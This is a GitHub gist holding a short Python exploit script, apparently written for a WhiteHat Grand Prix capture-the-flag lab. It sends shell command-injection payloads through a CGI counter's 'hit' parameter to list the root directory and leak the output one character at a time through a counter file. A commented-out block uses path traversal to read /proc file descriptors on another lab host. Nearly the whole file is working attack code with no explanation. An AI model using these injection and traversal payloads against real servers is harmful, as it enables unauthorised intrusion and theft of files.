Skip to content

Instantly share code, notes, and snippets.

@peternguyen93
Created October 28, 2015 03:01
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save peternguyen93/0c34bc33d99ff71593a7 to your computer and use it in GitHub Desktop.
import requests
cmd ='printf "%s|" /*'
# cmd = 'printf "%s|" /Sup3r_S3cr37_15_H3r3'
for i in xrange(400):
a = requests.get('http://lab4b.grandprix.whitehatvn.com/cgi-bin/counter?hit=`a=$('+cmd+'); b=${a:'+str(i)+':1}; printf "%d" "\'$b"> /run/cgicounter`;')
print chr(int(a.text.split(" ")[1].split("}")[0])),
'''
for fd in xrange(100):
a = requests.get('http://lab4.grandprix.whitehatvn.com/?game=../../../../../../../../../../../../../../../../proc/9229/fd/'+str(fd))
print fd, a.text.split('<div class="col-lg-4">')[0].split('<div class="col-lg-8">')[1]
'''
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment